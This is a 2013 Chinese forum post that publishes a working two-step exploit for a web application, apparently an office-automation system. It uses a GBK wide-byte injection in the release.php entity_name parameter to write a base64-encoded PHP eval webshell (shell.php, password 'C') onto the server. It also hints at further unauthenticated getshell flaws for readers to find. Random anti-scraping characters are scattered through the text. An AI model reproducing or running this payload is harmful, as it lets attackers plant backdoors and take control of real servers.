此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
" H* \' O! K/ {* C6 R
/ y, s; k D" _) X: W, O; I
2 f% Z# O; u+ {EXP:
9 X) D3 A% _( U% R& F- @* k4 Q3 } , S; ?. M( I$ O% t; b
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}3 K( |+ ?, p8 H
s8 A' q( j) w- }( o
第二步: [GET]http://site/general/email/index.php
4 _8 O% \8 t* u2 r4 I; b ; n0 \6 e/ Y; |3 b, \) M
SHELL: http://site/general/email/shell.php 密码C
& v6 W: v1 Q4 c7 V! n, l$ y
7 t* o0 ]8 a6 n! V
; p6 h' |8 y3 @( B0 |$ o7 y. W+ L此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好
6 u6 p- |- K- B- { ; {- `, L; \' e1 N8 }
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~, [/ E4 h% L4 o" V6 P
% q+ s2 s/ Y& h
- O @( O# |- S h: m# b0 X |
发表于 2013-2-4 16:19:29
收藏
支持
反对